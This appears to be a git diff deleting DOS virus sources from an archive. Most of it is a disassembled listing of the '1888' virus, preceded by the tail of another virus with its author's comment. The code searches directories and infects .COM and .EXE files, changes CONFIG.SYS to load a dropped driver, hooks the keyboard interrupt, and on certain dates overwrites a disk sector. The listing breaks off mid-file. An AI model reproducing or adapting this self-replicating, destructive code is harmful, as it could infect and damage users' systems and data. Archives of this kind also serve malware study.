0C4h,0C4h,0BDh, 18h, 19h, 03h - db 0BAh, 19h, 03h, 08h,0D6h,0C4h - db 0BDh, 19h, 04h,0BAh, 19h, 03h - db 0B7h, 20h,0BAh, 19h, 05h,0BAh - db 19h, 05h,0BAh, 19h, 03h,0B7h - db 20h,0BAh,0D3h, 19h, 02h,0B7h - db 20h,0BAh, 20h, 20h,0BAh,0D3h - db 19h, 02h,0BAh, 19h, 03h, 01h - db 0BAh, 19h, 03h, 18h, 19h, 03h - db 0BAh, 19h, 03h, 08h,0D3h, 1Ah - db 04h,0C4h,0BDh, 20h,0D3h, 1Ah - db 03h,0C4h,0BDh, 20h,0BDh, 19h - db 05h,0BDh, 19h, 05h,0D3h, 1Ah - db 03h,0C4h,0BDh, 20h,0D3h, 1Ah - db 03h,0C4h,0BDh, 20h,0D0h, 20h - db 20h,0D0h, 19h, 03h,0D0h, 19h - db 03h, 01h,0BAh, 19h, 03h, 18h - db 19h, 03h,0C8h, 1Ah, 15h,0CDh - db 0B8h, 19h, 0Ch,0D5h, 1Ah, 16h - db 0CDh,0BCh, 19h, 03h, 18h, 19h - db 1Ah,0D4h,0CDh, 04h, 1Ah, 03h - db 0F7h, 09h, 2Fh, 04h,0EAh, 09h - db 5Ch, 04h, 1Ah, 03h,0F7h, 01h - db 0CDh,0BEh, 19h, 1Bh, 18h - -data_1e equ 0A0h -dot_dot db '..',0 -heap: -; The following code is the buffer for the write function -code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) -oldint24 dd ? ; Storage for old int 24h handler -backslash db ? -origdir db 64 dup (?) ; Current directory buffer -newDTA db 43 dup (?) ; Temporary DTA -numinfec db ? ; Infections this run -buffer db 1ah dup (?) ; read buffer -endheap: ; End of virus -finish label near -end entry_point - - - -; Yeah, the main problem is reproducing the effect in an infected file so -; thta when IT runs, IT too will display... That's the GLITCH... -; -; Also, I had stuck INT 27H in somewhere around the EXIT .EXE... -; I don't remember, but it would go resident and suck up memory, yet -; since it hooked no interuppts, it just sat there... -; Feel free to STUDY this code and distribute it feely for educational -; purposes, because in spite of the kidding...I don't "hAcK"... for lack -; of a better word...--->>pAgE<<--- diff --git a/0-9/1888 (7).ASM b/0-9/1888 (7).ASM deleted file mode 100755 index ccc01a3..0000000 --- a/0-9/1888 (7).ASM +++ /dev/null @@ -1,1923 +0,0 @@ - -PAGE 59,132 - -; -; -; 1888 -; -; Created: 28-Jul-92 -; Passes: 5 Analysis Options on: none -; -; - -d_0040_001C_e equ 1Ch -d_0040_004A_e equ 4Ah -d_8B38_0003_e equ 3 ;* -data_0012_e equ 12h -data_0016_e equ 16h -data_00A3_e equ 0A3h -data_00A7_e equ 0A7h -data_00A9_e equ 0A9h -data_00AB_e equ 0ABh -data_00AF_e equ 0AFh -data_00B3_e equ 0B3h -data_00B5_e equ 0B5h -d_9E01_0000_e equ 0 ;* -d_9E01_0002_e equ 2 ;* -d_9E01_0004_e equ 4 ;* -d_9E01_0008_e equ 8 ;* -d_9E01_0014_e equ 14h ;* -d_9E01_0016_e equ 16h ;* - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1888 proc far - -start: - jmp loc_0767 -data_0103 db 20h -data_0104 dw 86C0h -data_0106 dw 18FCh -data_0108 dw 762h -data_010A dw 0 -data_010C db '1888.COM', 0 - db 00h, 00h, 00h,0A6h -data_0119 dw 25h -data_011B db 1 -data_011C dw 760h -data_011E db 0 -data_011F db 0 -data_0120 dw 762h -data_0122 dw 760h -data_0124 dw 0FFFEh -data_0126 dw 5369h ; Data table (indexed access) -data_0128 dw 5369h -data_012A dw 4C97h -data_012C dd 9E010000h -data_0130 dw 7C8h -data_0132 db 8 -data_0133 db 10h -data_0134 db 0 -data_0135 db 10h - db 0, 0, 0, 0 -data_013A db '\DANGER\1888' - db 20 dup (0) -data_015A db 'C:\', 0 - db '*', 0 - db 'NETWARE', 0 - db 'LMS', 0 - db 'MAUS', 0 - db 'MDB', 0 - db 'DOS', 0 - db 'BASE', 0 - db 'L', 0 -data_0180 dw 160h -data_0182 db 0 -data_0183 db 1 - db 14h, 17h, 6Eh, 00h, 01h,0A9h - db 00h, 01h,0BFh - db 38h -data_018E db 2Ah - db 2Eh, 65h, 78h, 65h, 00h -data_0194 db 2Ah - db 2Eh, 63h, 6Fh, 6Dh, 00h -data_019A db 0 -data_019B db 0 -data_019C db 0 -data_019D db 4 - db 3Fh - db 7 dup (3Fh) - db 43h, 4Fh, 4Dh, 23h, 04h, 00h - db 0F3h, 31h, 0Dh, 4Dh, 18h, 68h - db 20h,0C0h, 86h,0FCh, 18h, 62h - db 07h, 00h, 00h - db '1888.COM' - db 00h, 00h, 00h, 00h,0A6h,0EAh - db 0AAh, 03h, 00h,0CCh,0AAh, 03h - db 60h, 07h, 00h, 40h, 05h, 00h - db 60h, 07h, 00h, 01h,0C8h, 01h - db 19h, 01h, 00h, 00h, 69h, 53h - db 69h, 53h, 61h, 06h, 9Dh, 04h - db 16h, 32h, 21h, 00h, 7Bh, 1Ah - db 12h, 32h,0ADh, 04h, 69h, 53h - db 12h, 32h,0DEh, 07h - -1888 endp - -; -; SUBROUTINE -; - -sub_01F7 proc near - cmp data_011C,0 - jne loc_0207 ; Jump if not equal - mov ax,760h - mov data_011C,ax - mov data_0120,ax -loc_0207: - mov al,data_011E - mov data_011F,al - mov ax,data_0120 - mov data_0122,ax - inc data_0119 - mov data_019C,0 - mov data_019A,0 - mov data_019B,0 - retn -sub_01F7 endp - - -; -; SUBROUTINE -; - -sub_0227 proc near - lea dx,data_0183 ; Load effective addr - xor al,al ; Zero register - mov ah,3Dh ; '=' - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jc loc_ret_0239 ; Jump if carry Set - mov bx,ax - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - -loc_ret_0239: - retn -sub_0227 endp - - -; -; SUBROUTINE -; - -sub_023A proc near - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dh=month - ; dl=day, al=day-of-week 0=SUN - mov ah,dh - cmp cx,data_0130 - je loc_0249 ; Jump if equal - add ah,0Ch -loc_0249: - sub ah,data_0132 - mov data_011B,ah - mov data_0134,al - mov data_0133,dl - mov data_0132,dh - mov data_0130,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov data_0135,ch - retn -sub_023A endp - - -; -; SUBROUTINE -; - -sub_0269 proc near - mov ax,es - dec ax - push es - mov es,ax - mov ax,es:d_8B38_0003_e - mov data_012A,ax - pop es - mov bx,ax - sub bx,200h - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - mov bx,150h - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov word ptr data_012C+2,ax - retn -sub_0269 endp - - -; -; SUBROUTINE -; - -sub_028C proc near - push es - mov ax,word ptr data_012C+2 - mov es,ax - mov ah,49h ; 'I' - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ax,data_0128 - mov es,ax - mov bx,data_012A - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - pop es - retn -sub_028C endp - - -; -; SUBROUTINE -; - -sub_02A5 proc near - push ds - mov ah,1Bh - int 21h ; DOS Services ah=function 1Bh - ; get disk info, default drive - ; al=sectors per cluster - ; ds:bx=ptr to media ID byte - ; cx=sector size, dx=clusters - cmp byte ptr [bx],0F8h - pop ds - retn -sub_02A5 endp - - -; -; SUBROUTINE -; - -sub_02AF proc near - lea si,data_019D ; Load effective addr - mov di,si - xor dl,dl ; Zero register - mov ah,47h ; 'G' - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - ; ds:si=ASCIIZ directory name - mov cx,30h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - lea di,data_013A ; ('\DANGER\1888') Load effective addr - mov al,5Ch ; '\' - stosb ; Store al to es:[di] - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_02AF endp - - -; -; SUBROUTINE -; - -sub_02D0 proc near - mov data_0182,0 - lea bx,cs:[160h] ; Load effective addr - add bx,20h - mov data_0180,bx - sub bx,20h - lea dx,data_015A+4 ; ('*') Load effective addr - mov cx,33h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_031F ; Jump if carry Set -loc_02F0: - lea di,data_019D ; Load effective addr - add di,1Eh - cmp byte ptr [di],2Eh ; '.' - je loc_0319 ; Jump if equal - mov si,di - mov cx,20h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - mov di,bx - add bx,cx - cmp bx,data_0180 - ja loc_031F ; Jump if above - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - inc data_0182 -loc_0319: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_02F0 ; Jump if carry=0 -loc_031F: - lea bx,cs:[160h] ; Load effective addr - mov data_0180,bx - retn -sub_02D0 endp - - -; -; SUBROUTINE -; - -sub_0328 proc near - cmp data_0182,0 - je loc_ret_034C ; Jump if equal - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov dx,data_0180 - mov di,dx - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov al,0 - mov cx,20h - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov data_0180,di - -loc_ret_034C: - retn -sub_0328 endp - - -; -; SUBROUTINE -; - -sub_034D proc near - mov ax,data_0104 - and al,1Fh - cmp al,1Eh - retn -sub_034D endp - - -; -; SUBROUTINE -; - -sub_0355 proc near - lea dx,data_0194 ; Load effective addr - cmp data_011E,0 - je loc_0364 ; Jump if equal - lea dx,data_018E ; Load effective addr -loc_0364: - mov cx,23h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - retn -sub_0355 endp - - -; -; SUBROUTINE -; - -sub_036C proc near - lea si,data_019D ; Load effective addr - add si,15h - lea di,data_0103 ; Load effective addr - mov cx,16h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_036C endp - - -; -; SUBROUTINE -; - -sub_037D proc near - pushf ; Push flags - mov cx,data_0104 - or cl,1Fh - and cl,0FEh - mov dx,data_0106 - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; set file date+time, bx=handle - ; cx=time, dx=time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - lea dx,data_010C ; ('1888.COM') Load effective addr - xor ch,ch ; Zero register - mov cl,data_0103 - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - popf ; Pop flags - retn -sub_037D endp - - -; -; SUBROUTINE -; - -sub_03A6 proc near - lea dx,data_010C ; ('1888.COM') Load effective addr - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - jc loc_ret_03BA ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - -loc_ret_03BA: - retn -sub_03A6 endp - - -; -; SUBROUTINE -; - -sub_03BB proc near - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov cx,100h - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - cmp word ptr ds:d_9E01_0000_e,5A4Dh - nop ;*ASM fixup - sign extn byte - je loc_03D6 ; Jump if equal - stc ; Set carry flag - jmp loc_0455 -loc_03D6: - call sub_0457 - push ax - mov ax,di - and ax,0Fh - mov cx,10h - xor dx,dx ; Zero register - sub cx,ax - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jnc loc_03EF ; Jump if carry=0 - jmp short loc_0455 - db 90h -loc_03EF: - mov si,ax - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jc loc_0455 ; Jump if carry Set - pop dx - mov ax,di - add ax,si - add ax,100h - cmp ax,200h - jb loc_040B ; Jump if below - and ax,1FFh - inc dx -loc_040B: - mov cl,4 - shr ax,cl ; Shift w/zeros fill - dec dx - mov cl,5 - shl dx,cl ; Shift w/zeros fill - sub dx,ds:d_9E01_0008_e - add ax,dx - sub ax,10h - mov ds:d_9E01_0016_e,ax - mov word ptr ds:d_9E01_0014_e,100h - push ds - mov ax,cs - mov ds,ax - mov cx,data_011C - mov dx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - jc loc_0455 ; Jump if carry Set - call sub_0457 - mov ds:d_9E01_0002_e,di - mov ds:d_9E01_0004_e,ax - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_0455 ; Jump if carry Set - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_0455: - pop ds - retn -sub_03BB endp - - -; -; SUBROUTINE -; - -sub_0457 proc near - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov di,ax - and di,1FFh - mov cl,9 - shr ax,cl ; Shift w/zeros fill - mov cl,7 - shl dx,cl ; Shift w/zeros fill - add ax,dx - inc ax - retn -sub_0457 endp - - -; -; SUBROUTINE -; - -sub_0472 proc near - mov ax,data_0108 - mov data_0120,ax - mov cx,data_011C - cmp cx,ax - jb loc_0488 ; Jump if below - mov data_0120,cx - mov cx,data_0108 -loc_0488: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - jc loc_ret_04DD ; Jump if carry Set - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_04DD ; Jump if carry Set - mov dx,100h - mov cx,data_011C - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - int 3 ; Debug breakpoint - cmp ax,cs:data_0108 - ja loc_04CC ; Jump if above - mov ax,4200h - mov dx,data_0108 - mov data_0120,dx - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_04DD ; Jump if carry Set - mov cx,data_011C - jmp short loc_04D0 -loc_04CC: - mov cx,data_0108 -loc_04D0: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - -loc_ret_04DD: - retn -sub_0472 endp - - -; -; SUBROUTINE -; - -sub_04DE proc near - cmp data_011B,2 - ja loc_04E8 ; Jump if above - xor ax,ax ; Zero register - retn -loc_04E8: - mov al,data_0133 - and al,1 - retn -sub_04DE endp - - -; -; SUBROUTINE -; - -sub_04EE proc near - cmp data_0133,0Fh - jb loc_0507 ; Jump if below - mov al,data_0135 - cmp al,13h - jb loc_0507 ; Jump if below - mov ax,40h - mov es,ax - mov byte ptr es:d_0040_004A_e,23h ; '#' -loc_0507: - cmp data_0133,0Dh - jne loc_ret_0524 ; Jump if not equal - cmp data_0134,5 - jne loc_ret_0524 ; Jump if not equal - mov ax,301h - mov cx,1 - mov dx,50h - xor bx,bx ; Zero register - mov es,bx - int 13h ; Disk dl=drive ? ah=func 03h - ; write sectors from mem es:bx - ; al=#,ch=cyl,cl=sectr,dh=head - -loc_ret_0524: - retn -sub_04EE endp - - -; -; SUBROUTINE -; - -sub_0525 proc near - mov data_019B,1 - lea dx,data_05C1 ; Load effective addr - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jnc loc_0564 ; Jump if carry=0 - mov ah,3Ch ; '<' - mov cx,6 - int 21h ; DOS Services ah=function 3Ch - ; create/truncate file @ ds:dx - mov bx,ax - lea dx,data_05EE ; Load effective addr - mov cx,data_070A - mov si,dx - add si,data_00B3_e - mov ax,data_0130 - mov [si],ax - mov ah,data_0132 - mov [si+2],ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - jc loc_05BD ; Jump if carry Set -loc_0564: - lea dx,data_05C7 ; Load effective addr - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_05BD ; Jump if carry Set - call sub_036C - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - jc loc_05BD ; Jump if carry Set - mov cx,data_0108 - push es - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov es,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - mov dx,ax - mov ax,0FFFFh - xor di,di ; Zero register - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp ax,es:[di-1] - pop es - jz loc_05BD ; Jump if zero - mov ax,4200h - xor cx,cx ; Zero register - dec dx - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_05BD ; Jump if carry Set - lea dx,data_05D5 ; Load effective addr - mov cx,19h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_05BD: - call sub_037D - retn -sub_0525 endp - -data_05C1 db 43h - db 3Ah, 5Ch,0FFh,0FFh, 00h -data_05C7 db 'C:\CONFIG.SYS', 0 -data_05D5 db 'DEVICE =' - db 0FFh,0FFh - db ' COUNTRY.SYS', 0Dh, 0Ah - db 1Ah -data_05EE db 0FFh - db 0FFh,0FFh,0FFh, 40h,0C8h, 16h - db 00h, 21h, 00h - db 'hgt42 ' - db 00h, 00h, 00h, 00h, 2Eh, 89h - db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h - db 14h, 00h,0CBh, 1Eh, 06h, 0Eh - db 1Fh,0C4h, 3Eh, 12h, 00h, 26h - db 8Ah, 45h, 02h, 3Ch, 00h, 75h - db 03h,0E8h, 82h, 00h - db 0Dh, 00h, 10h, 26h, 89h, 45h - db 03h, 07h, 1Fh,0CBh, 50h, 53h - db 51h, 1Eh - db 0E4h, 60h,0A8h, 80h, 75h, 30h - db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah - db 0C7h, 75h, 27h,0B8h, 40h, 00h - db 8Eh,0D8h,0E8h, 28h, 00h, 25h - db 05h, 00h, 8Bh,0C8h - db 0BBh, 1Ch, 00h - -locloop_064F: - mov ax,cs:data_00A9_e - mov [bx],ax - add bx,2 - cmp bx,3Fh - jb loc_0660 ; Jump if below - mov bx,1Eh -loc_0660: - mov word ptr ds:[1Ch],bx - loop locloop_064F ; Loop if cx > 0 - -loc_0666: - pop ds - pop cx - pop bx - pop ax - jmp dword ptr cs:data_00A3_e - -; -; SUBROUTINE -; - -sub_066F proc near - mov ax,cs:data_00A7_e - push ax - and ah,0B4h - pop ax - jp loc_067B ; Jump if parity=1 - stc ; Set carry flag -loc_067B: - rcl ax,1 ; Rotate thru carry - mov cs:data_00A7_e,ax - retn -sub_066F endp - - db 'hgt42 ' - db 00h, 56h, 31h, 00h, 46h, 52h - db 44h, 00h, 00h, 00h, 00h, 00h - db 00h, 65h, 12h, 65h, 73h, 74h - db 6Eh, 12h, 1Fh, 14h, 31h,0CDh - db 0ABh,0EFh - db 06h, 57h,0B4h, 2Ah,0CDh, 21h - db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h - db 74h, 03h, 80h,0C4h - db 0Ch -loc_06B5: - sub ah,ds:data_00B5_e - cmp ah,3 - jb loc_06FB ; Jump if below - mov ds:data_00B5_e,dh - mov ds:data_00B3_e,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov ds:data_00A7_e,dx - call sub_066F - mov bx,ax - and bx,3 - nop ;*ASM fixup - sign extn byte - mov al,ds:data_00AB_e[bx] - mov ah,ds:data_00AF_e[bx] - mov ds:data_00A9_e,ax - mov ax,3516h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_00A3_e,bx - mov bx,es - mov word ptr ds:data_00A3_e+2,bx - cli ; Disable interrupts -;* mov dx,offset loc_003E ;* - db 0BAh, 3Eh, 00h - mov ax,2516h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - sti ; Enable interrupts -loc_06FB: - pop di - pop es - mov word ptr es:[di+0Eh],0B6h - mov es:[di+10h],cs - xor ax,ax ; Zero register - retn -data_070A dw 11Ch -data_070C db 8Bh - db 1Eh, 28h, 01h,0A1h, 26h, 01h - db 8Eh,0D0h, 8Bh, 26h, 24h, 01h - dw 0EC83h, 8B04h - dw 80F4h, 1F3Eh - dw 1, 2875h - dw 0BFh, 3601h - dw 3C89h, 0FB8Bh - dw 8936h, 27Ch - dw 0FF33h, 8936h - dw 47Ch, 0BFh - dw 8B01h, 2236h - dw 301h, 8BF7h - dw 1C0Eh, 8C01h - dw 8ED8h, 0F3C0h - dw 0EBA4h, 9016h - db 8Bh,0FBh, 83h,0C7h, 10h,0A1h - db 16h, 00h, 03h,0F8h, 36h, 89h - db 7Ch, 02h, 8Bh, 3Eh, 14h, 00h - db 36h, 89h - db 3Ch - db 8Eh,0DBh, 8Eh,0C3h,0CBh -loc_0767: - mov ax,ss - mov cs:data_0126,ax - mov cs:data_0124,sp - mov ax,cs - mov ss,ax - mov sp,1F7h - push ds - mov ds,ax - pop ax - mov data_0128,ax - call sub_0269 - mov ax,cs - mov es,ax - call sub_01F7 - mov dx,offset data_019D - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA(disk xfer area) ds:dx - call sub_02AF - call sub_02A5 - jnc loc_079C ; Jump if carry=0 - jmp loc_083A -loc_079C: - call sub_0227 - jc loc_07A4 ; Jump if carry Set - jmp loc_083A -loc_07A4: - call sub_023A - call sub_02D0 - mov data_011E,0 -loc_07AF: - call sub_0355 - jc loc_0800 ; Jump if carry Set -loc_07B4: - cmp data_019C,4 - ja loc_083A ; Jump if above - call sub_036C - call sub_034D - jnc loc_07FA ; Jump if carry=0 - cmp data_010A,4 - ja loc_07FA ; Jump if above - call sub_03A6 - jc loc_083A ; Jump if carry Set - cmp data_011E,0 - je loc_07DB ; Jump if equal - call sub_03BB - jmp short loc_07DE -loc_07DB: - call sub_0472 -loc_07DE: - call sub_037D - jc loc_083A ; Jump if carry Set - inc data_019C - cmp data_019B,1 - je loc_07FA ; Jump if equal - call sub_04DE - jz loc_07FA ; Jump if zero - call sub_0525 - jc loc_083A ; Jump if carry Set - jmp short loc_07AF -loc_07FA: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_07B4 ; Jump if carry=0 -loc_0800: - cmp data_011E,1 - je loc_080E ; Jump if equal - mov data_011E,1 - jmp short loc_07AF -loc_080E: - mov data_011E,0 - cmp data_019A,0 - jne loc_0829 ; Jump if not equal - lea dx,data_015A ; ('C:\') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov data_019A,0FFh - jmp short loc_07AF -loc_0829: - cmp data_0182,0 - je loc_083A ; Jump if equal - call sub_0328 - dec data_0182 - jmp loc_07AF -loc_083A: - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - call sub_04DE - jz loc_084A ; Jump if zero - call sub_04EE -loc_084A: - mov ax,word ptr data_012C+2 - mov es,ax - mov cx,5Bh - mov si,offset data_070C - xor di,di ; Zero register - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - call sub_028C - call data_012C - int 20h ; DOS program terminate - db 0E9h, 64h, 06h, 20h,0A4h, 86h - db 0FCh, 18h, 02h, 00h, 00h, 00h - db 31h, 2Eh, 43h, 4Fh, 4Dh, 00h - db 20h, 20h, 4Dh, 00h, 00h, 00h - db 0A6h, 24h, 00h, 00h, 60h, 07h - db 00h, 00h, 60h, 07h, 60h, 07h - db 0FEh,0FFh, 6Ch, 0Dh, 6Ch, 0Dh - db 94h, 92h, 00h, 00h, 01h, 9Eh - db 0C8h, 07h, 07h, 1Ch, 02h, 10h - db 00h, 00h, 00h, 00h, 5Ch, 00h - db 4Fh, 53h, 53h, 49h, 00h, 45h - db 4Eh, 00h - db 53h, 54h - db 20 dup (0) - db 'C:\', 0 - db '*', 0 - db 'NETWARE', 0 - db 'LMS', 0 - db 'MAUS', 0 - db 'MDB', 0 - db 'DOS', 0 - db 'BASE', 0 - db 'L', 0 - db '`' - db 01h, 00h, 01h, 14h, 17h, 6Eh - db 00h, 01h,0A9h, 00h, 01h,0BFh - db 38h, 2Ah, 2Eh, 65h, 78h, 65h - db 00h, 2Ah, 2Eh, 63h, 6Fh, 6Dh - db 00h, 00h, 00h, 04h, 01h - db 3Fh - db 7 dup (3Fh) - db 43h, 4Fh, 4Dh, 23h, 0Ah, 00h - db 00h, 00h, 31h,0C0h, 50h, 9Ah - db 20h,0A4h, 86h,0FCh, 18h, 02h - db 00h, 00h, 00h, 31h, 2Eh, 43h - db 4Fh, 4Dh, 00h, 20h, 20h, 4Dh - db 00h, 00h, 00h,0A6h,0EAh,0AAh - db 03h, 00h,0CCh,0AAh, 03h, 00h - db 00h, 31h, 31h, 00h, 40h, 48h - db 07h, 00h, 40h, 6Ch, 15h, 6Ch - db 15h, 00h, 40h, 05h, 00h, 60h - db 07h, 00h, 01h,0C8h, 01h, 19h - db 01h, 82h, 08h, 6Ch, 0Dh, 6Ch - db 0Dh,0ADh, 04h, 6Ch, 0Dh, 46h - db 72h,0DEh, 07h - -; -; SUBROUTINE -; - -sub_0959 proc near - cmp data_011C,0 - jne loc_0969 ; Jump if not equal - mov ax,760h - mov data_011C,ax - mov data_0120,ax -loc_0969: - mov al,data_011E - mov data_011F,al - mov ax,data_0120 - mov data_0122,ax - inc data_0119 - mov data_019C,0 - mov data_019A,0 - mov data_019B,0 - retn -sub_0959 endp - - -; -; SUBROUTINE -; - -sub_0989 proc near - lea dx,data_0183 ; Load effective addr - xor al,al ; Zero register - mov ah,3Dh ; '=' - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jc loc_ret_099B ; Jump if carry Set - mov bx,ax - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - -loc_ret_099B: - retn -sub_0989 endp - - -; -; SUBROUTINE -; - -sub_099C proc near - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dh=month - ; dl=day, al=day-of-week 0=SUN - mov ah,dh - cmp cx,data_0130 - je loc_09AB ; Jump if equal - add ah,0Ch -loc_09AB: - sub ah,data_0132 - mov data_011B,ah - mov data_0134,al - mov data_0133,dl - mov data_0132,dh - mov data_0130,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov data_0135,ch - retn -sub_099C endp - - -; -; SUBROUTINE -; - -sub_09CB proc near - mov ax,es - dec ax - push es - mov es,ax - mov ax,es:d_8B38_0003_e - mov data_012A,ax - pop es - mov bx,ax - sub bx,200h - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - mov bx,150h - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov word ptr data_012C+2,ax - retn -sub_09CB endp - - -; -; SUBROUTINE -; - -sub_09EE proc near - push es - mov ax,word ptr data_012C+2 - mov es,ax - mov ah,49h ; 'I' - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ax,data_0128 - mov es,ax - mov bx,data_012A - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - pop es - retn -sub_09EE endp - - -; -; SUBROUTINE -; - -sub_0A07 proc near - push ds - mov ah,1Bh - int 21h ; DOS Services ah=function 1Bh - ; get disk info, default drive - ; al=sectors per cluster - ; ds:bx=ptr to media ID byte - ; cx=sector size, dx=clusters - cmp byte ptr [bx],0F8h - pop ds - retn -sub_0A07 endp - - -; -; 